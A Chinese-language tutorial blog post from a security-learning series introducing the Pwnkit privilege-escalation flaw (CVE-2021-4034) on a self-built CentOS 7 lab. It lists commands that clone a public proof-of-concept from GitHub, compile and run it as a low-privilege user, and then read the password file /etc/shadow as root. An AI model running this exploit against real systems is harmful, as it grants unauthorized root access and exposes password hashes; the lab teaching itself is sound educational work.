iT邦幫忙

2022 iThome 鐵人賽

DAY 13
1

可不可以放進去一下下就好 - 巴大雄(2022) /images/emoticon/emoticon17.gif

Yes

  • 第13天開始要進入新的提權攻擊領域,但別擔心以我的能力不會講太難的漏洞啦,這次先從一個存在 Linux 作業系統 12年的提權漏洞 Pwnkit 開始介紹起吧。/images/emoticon/emoticon07.gif

  • 漏洞相關資訊

    • 漏洞編號 : CVE-2021-4034
    • CVSS 3.0 分數 : 7.8 HIGH
    • 漏洞類型 : 權限提升
    • 使用版本資訊
      • VirtualBox
      • CentOS 7
    • 漏洞先備知識 :
      • C 程式語言基本概念
    • 漏洞收穫技能 :
      • Linux SUID 提權概念
      • Memory Overflow 攻擊概念
  • 提權,在滲透測試的階段中算是中期階段會做的行為,通常要能夠提權必須先在主機有控制權才能夠往後進行下一步,也因此題權的弱點分數通常都不會太高。

  • 但為何需要提權呢? 因為有時候應用程式是遵循最小權限原則去執行服務的,因此透過漏洞得到的權限並非想像中的高,但當攻擊者想做一些需要高權限的動作時(ex: 安裝套件、讀取密碼資訊)就會遇到無法執行的問題,這時候就要進行所謂的提權攻擊。

  • 而提權攻擊的效果,就是可以讓一隻低權限的帳號"趴"的一聲變成具有高權限的帳號(通常是root),雖然過程很樸實無華,但提權的漏洞背後通常都有著與網頁應用程式漏洞不同的原理。

  • 那這次漏洞的建立主要會透過 CentOS7 當作搭建環境,原因是該作業系統裝好後就自帶 Pwnkit 漏洞。既然都換作業系統了,就順便換個虛擬化軟體 VirtualBox,順便體驗一下我之前說它難設定的部分。

建立步驟如下 :

  1. 打開 VirtualBox,點擊主機網路管理員,如果沒有的話新增一張
  2. 建立新的 VM 環境,但要注意網路的設定。如果要達到VMWare NAT網路的效果,並須新增兩張網卡,一張 NAT 跟一張 Host-only。 參考資料 6.2. Introduction to Networking Modes
Mode VM→Host VM←Host VM1←→VM2 VM→Net/LAN VM←Net/LAN
Host-only + + + - -
Internal - - + - -
Bridged + + + + +
NAT + Port forward - + Port forward
NATservice + Port forward + + Port forward
  1. 開始安裝 CentOS 7,注意選擇[最小化安裝]、[設定自動啟用網路卡]、[設定HostName]
  2. 安裝成功後可以試著用 Host 去 ping 不同的 IP
  3. sudo yum install git gcc net-tools vim tree
  4. sudo useradd low
  5. sudo passwd low #設定一下 low 的帳號密碼
  6. su low # 切換到 low 帳號
  7. cd ~ # 切換回自己家目錄
  8. sudo cat /etc/shadow # 測試一下權限
  9. git clone https://github.com/arthepsy/CVE-2021-4034.git
  10. cd CVE-2021-4034
  11. gcc cve-2021-4034-poc.c
  12. ./a.out
  13. cat /etc/shadow # 測試一下權限
  • 這樣子就提權完畢了,那下個影片就要來看看這個漏洞 pwnkit 的原理到底是甚麼~~~?? /images/emoticon/emoticon19.gif

上一篇
Day12 - 總有那麼一個人,在乎的不是你能飛多高,而是你能否被%0d%0a繞過。 (作業4解答)
下一篇
Day14 - Pwnkit 如果沒有 SUID,那跟鹹魚有什麼分別? (作業5)
系列文
從建立環境、驗證漏洞、感受漏洞來學習資安37
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言